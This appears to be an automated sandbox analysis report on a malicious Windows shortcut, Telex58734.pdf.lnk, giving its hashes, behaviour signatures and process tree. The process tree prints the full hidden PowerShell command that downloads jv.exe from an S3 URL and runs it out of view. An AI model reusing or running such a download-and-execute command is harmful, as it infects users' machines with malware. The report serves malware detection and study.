Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    29-05-2024 17:06

General

  • Target

    Telex58734.pdf.lnk

  • Size

    1KB

  • MD5

    ee0e01d5cde42c26bba7e8b06380c146

  • SHA1

    042c5bf844185917bd38d86b88640656b8710c2b

  • SHA256

    b137bcb29d0d26422581e4e556bc1f9f29096d21de865c7d1a3e945434edd07f

  • SHA512

    2af9903fb458549dab35e290229d62a68f692dacb3515d66e092b86bc24e8e4c4e79c80ab6d0df42a0e11365f27ece414acc04f4932f23dd588ce89e89f98831

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://compliancekyc.s3.eu-west-1.amazonaws.com/jv.exe

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\Telex58734.pdf.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2172
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$wc=New-Object Net.WebClient; $wc.DownloadFile('https://compliancekyc.s3.eu-west-1.amazonaws.com/jv.exe', 'C:\Users\Admin\AppData\Roaming\jv.exe'); Start-Process -WindowStyle Hidden 'C:\Users\Admin\AppData\Roaming\jv.exe'"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2592

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2592-38-0x000007FEF5C7E000-0x000007FEF5C7F000-memory.dmp

    Filesize

    4KB

  • memory/2592-39-0x000000001B690000-0x000000001B972000-memory.dmp

    Filesize

    2.9MB

  • memory/2592-41-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

    Filesize

    9.6MB

  • memory/2592-40-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

    Filesize

    9.6MB

  • memory/2592-42-0x0000000002780000-0x0000000002788000-memory.dmp

    Filesize

    32KB

  • memory/2592-43-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

    Filesize

    9.6MB

  • memory/2592-44-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

    Filesize

    9.6MB

  • memory/2592-45-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

    Filesize

    9.6MB

  • memory/2592-46-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

    Filesize

    9.6MB